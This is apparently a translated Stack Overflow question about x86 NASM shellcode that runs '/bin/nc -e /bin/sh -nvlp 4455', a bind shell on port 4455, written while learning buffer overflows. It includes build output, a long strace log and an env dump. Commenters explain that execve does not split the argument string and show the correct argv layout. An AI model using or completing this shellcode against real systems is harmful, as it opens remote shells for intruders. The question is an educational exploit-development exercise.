【发布时间】:2021-12-28 06:27:25
【问题描述】:
我一直在学习缓冲区溢出,我正在尝试通过 shellcode /bin/nc -e /bin/sh -nvlp 4455 执行以下命令。这是我的汇编代码:
;Simple assembly execve call to execute /bin/ls -la
;modified to execve >
;/bin/nc -e /bin/sh -nvlp 4455
global _start
section .text
_start:
xor eax, eax ;create null eax register
push eax ;push null eax register to the stack
push 0x636e2f2f ;push command to the stack
push 0x6e69622f ;"/bin//nc"
mov ebx, esp ;move pointer to command into ebx
push eax ;push null eax register to the stack
;push 0x61616c2d ;push argument to the stack "-laa"
push 0x35353434 ;push "4455"
push 0x20706c76 ;push "vlp "
push 0x6e2d2068 ;push "h -n"
push 0x7361622f ;push "/bas"
push 0x6e69622f ;push "/bin"
push 0x2f20652d ;push "-e /"
push 0x636e2f2f ;push "//nc"
push 0x6e69622f ;push "/bin"
mov esi, esp ;move stack pointer to esi
push eax ;push null eax register to the stack
push esi ;push address of the argument to the stack
push ebx ;push address of the command to the stack
mov ecx, esp ;move pointer to start of the command to ecx
mov edx,eax ;null arguments for last execve (file, argv, envp)
mov al, 0xb ;define execve
int 0x80 ;execute command
我正在使用以下命令来构建程序集文件。我不断转发主机查找失败。未知主机错误。难道我做错了什么?我有
$ make all
nasm -f elf32 shellcode.asm
ld -m elf_i386 -o shellcode shellcode.o
┌──(kali㉿kali)-[~/Desktop/assembly]
└─$ ./shellcode
/bin//nc-e //bin/bash -nvlp 4455: forward host lookup failed: Unknown host
这里也是 strace 输出。这对我来说太乱了,我什至听不懂。
execve("./shellcode", ["./shellcode"], 0x7fffffffe070 /* 55 vars */) = 0
execve("/bin//nc", ["/bin//nc", "/bin//nc-e //bin/bash -nvlp 4455"], NULL) = 0
brk(NULL) = 0x55555555e000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=95011, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 95011, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7fae000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\320\276\243\212\v\307^\t\263h8\371\266h\r\350"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1835120, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fac000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1868664, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7de3000
mprotect(0x7ffff7e09000, 1654784, PROT_NONE) = 0
mmap(0x7ffff7e09000, 1343488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7ffff7e09000
mmap(0x7ffff7f51000, 307200, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16e000) = 0x7ffff7f51000
mmap(0x7ffff7f9d000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b9000) = 0x7ffff7f9d000
mmap(0x7ffff7fa3000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fa3000
close(3) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7de1000
arch_prctl(ARCH_SET_FS, 0x7ffff7fad600) = 0
mprotect(0x7ffff7f9d000, 12288, PROT_READ) = 0
mprotect(0x55555555c000, 4096, PROT_READ) = 0
mprotect(0x7ffff7ffb000, 8192, PROT_READ) = 0
munmap(0x7ffff7fae000, 95011) = 0
getpid() = 15163
newfstatat(AT_FDCWD, "/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=74, ...}, 0) = 0
brk(NULL) = 0x55555555e000
brk(0x55555557f000) = 0x55555557f000
openat(AT_FDCWD, "/etc/host.conf", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=9, ...}, AT_EMPTY_PATH) = 0
read(3, "multi on\n", 4096) = 9
read(3, "", 4096) = 0
close(3) = 0
openat(AT_FDCWD, "/etc/resolv.conf", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=74, ...}, AT_EMPTY_PATH) = 0
read(3, "# Generated by NetworkManager\nse"..., 4096) = 74
read(3, "", 4096) = 0
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=74, ...}, AT_EMPTY_PATH) = 0
close(3) = 0
getpid() = 15163
rt_sigaction(SIGINT, {sa_handler=0x555555557280, sa_mask=[INT], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7ffff7e1f910}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=0x555555557280, sa_mask=[QUIT], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7ffff7e1f910}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTERM, {sa_handler=0x555555557280, sa_mask=[TERM], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7ffff7e1f910}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGURG, {sa_handler=SIG_IGN, sa_mask=[URG], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7ffff7e1f910}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGPIPE, {sa_handler=SIG_IGN, sa_mask=[PIPE], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7ffff7e1f910}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
newfstatat(AT_FDCWD, "/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=74, ...}, 0) = 0
socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
connect(3, {sa_family=AF_UNIX, sun_path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
close(3) = 0
socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
connect(3, {sa_family=AF_UNIX, sun_path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
close(3) = 0
newfstatat(AT_FDCWD, "/etc/nsswitch.conf", {st_mode=S_IFREG|0644, st_size=542, ...}, 0) = 0
newfstatat(AT_FDCWD, "/", {st_mode=S_IFDIR|0755, st_size=36864, ...}, 0) = 0
openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=542, ...}, AT_EMPTY_PATH) = 0
read(3, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 542
read(3, "", 4096) = 0
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=542, ...}, AT_EMPTY_PATH) = 0
close(3) = 0
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=95011, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 95011, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7fae000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\3202\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=47664, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 75544, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7dce000
mmap(0x7ffff7dd1000, 24576, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7ffff7dd1000
mmap(0x7ffff7dd7000, 8192, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x9000) = 0x7ffff7dd7000
mmap(0x7ffff7dd9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xa000) = 0x7ffff7dd9000
mmap(0x7ffff7ddb000, 22296, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7ddb000
close(3) = 0
mprotect(0x7ffff7dd9000, 4096, PROT_READ) = 0
munmap(0x7ffff7fae000, 95011) = 0
openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=184, ...}, AT_EMPTY_PATH) = 0
lseek(3, 0, SEEK_SET) = 0
read(3, "127.0.0.1\tlocalhost\n127.0.1.1\tka"..., 4096) = 184
read(3, "", 4096) = 0
close(3) = 0
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=95011, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 95011, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7fae000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\20\22\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=18504, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 20496, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7dc8000
mmap(0x7ffff7dc9000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1000) = 0x7ffff7dc9000
mmap(0x7ffff7dcb000, 4096, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7ffff7dcb000
mmap(0x7ffff7dcc000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7ffff7dcc000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libresolv.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260C\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=93080, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 105088, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7dae000
mprotect(0x7ffff7db2000, 73728, PROT_NONE) = 0
mmap(0x7ffff7db2000, 57344, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x4000) = 0x7ffff7db2000
mmap(0x7ffff7dc0000, 12288, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12000) = 0x7ffff7dc0000
mmap(0x7ffff7dc4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15000) = 0x7ffff7dc4000
mmap(0x7ffff7dc6000, 6784, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7dc6000
close(3) = 0
mprotect(0x7ffff7dc4000, 4096, PROT_READ) = 0
mprotect(0x7ffff7dcc000, 4096, PROT_READ) = 0
munmap(0x7ffff7fae000, 95011) = 0
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=95011, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 95011, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7fae000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260!\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=31136, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 32984, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7da5000
mmap(0x7ffff7da7000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7ffff7da7000
mmap(0x7ffff7dab000, 4096, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7ffff7dab000
mmap(0x7ffff7dac000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7ffff7dac000
close(3) = 0
mprotect(0x7ffff7dac000, 4096, PROT_READ) = 0
munmap(0x7ffff7fae000, 95011) = 0
write(2, "/bin//nc-e //bin/bash -nvlp 4455"..., 62) = 62
write(2, "Unknown host", 12) = 12
write(2, "\n", 1) = 1
close(-1) = -1 EBADF (Bad file descriptor)
exit_group(1) = ?
+++ exited with 1 +++
env 命令的结果:
COLORFGBG=15;0
COLORTERM=truecolor
COMMAND_NOT_FOUND_INSTALL_PROMPT=1
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
DESKTOP_SESSION=lightdm-xsession
DISPLAY=:0.0
DOTNET_CLI_TELEMETRY_OPTOUT=1
GDMSESSION=lightdm-xsession
GDM_LANG=en_US.utf8
GTK_MODULES=gail:atk-bridge
HOME=/home/kali
LANG=en_US.UTF-8
LANGUAGE=
LOGNAME=kali
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/home/kali/.local/bin
POWERSHELL_TELEMETRY_OPTOUT=1
POWERSHELL_UPDATECHECK=Off
PWD=/home/kali/Desktop/assembly
QT_ACCESSIBILITY=1
QT_AUTO_SCREEN_SCALE_FACTOR=0
QT_QPA_PLATFORMTHEME=qt5ct
SESSION_MANAGER=local/kali:@/tmp/.ICE-unix/1132,unix/kali:/tmp/.ICE-unix/1132
SHELL=/usr/bin/zsh
SSH_AGENT_PID=1180
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXkm5FhN/agent.1132
TERM=xterm-256color
USER=kali
WINDOWID=0
XAUTHORITY=/home/kali/.Xauthority
XDG_CONFIG_DIRS=/etc/xdg
XDG_CURRENT_DESKTOP=XFCE
XDG_DATA_DIRS=/usr/share/xfce4:/usr/local/share/:/usr/share/:/usr/share
XDG_GREETER_DATA_DIR=/var/lib/lightdm/data/kali
XDG_MENU_PREFIX=xfce-
XDG_RUNTIME_DIR=/run/user/1000
XDG_SEAT=seat0
XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0
XDG_SESSION_CLASS=user
XDG_SESSION_DESKTOP=lightdm-xsession
XDG_SESSION_ID=9
XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0
XDG_SESSION_TYPE=x11
XDG_VTNR=7
_JAVA_OPTIONS=-Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
SHLVL=1
OLDPWD=/home/kali/Desktop
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
LESS_TERMCAP_mb=
LESS_TERMCAP_md=
LESS_TERMCAP_me=
LESS_TERMCAP_so=
LESS_TERMCAP_se=
LESS_TERMCAP_us=
LESS_TERMCAP_ue=
_=/usr/bin/env
【问题讨论】:
-
如果有一个重要的环境变量要传递,我不会感到惊讶。
-
@fuz 你的意思是 edx 应该被填满吗?
-
可能。你能在你的系统上添加
env的输出吗? -
execve不进行分词;你传递了nc一个 argv[1] ="/bin//nc-e //bin/bash -nvlp 4455",就像你在 bash 中使用这些双引号一样。这就是strace在第二行输出中向您展示的内容(您的shellcode 进行的第一个系统调用)。当我尝试它时,nc的一个版本说“缺少端口号”。ncat说Could not resolve hostname "/bin//nc-e //bin/bash -nvlp 4455": Name or service not known。您的 netcat 的操作基本相同,但对于将哪个字符串视为主机名只是不太清楚。 -
@PeterCordes 谢谢你的想法。我正在考虑如何将每个参数分开,因为我觉得错误的原因与您描述的相似。我试图让 strace 结果采用
execve("/bin/nc", (char *[]) {"/bin/nc", "-e","/bin/sh", "-lvp4455", NULL }, NULL);的格式,我终于明白了。我将在几个小时内自己回答解决方案,并正确解释我所做的事情。
标签: assembly x86 nasm netcat shellcode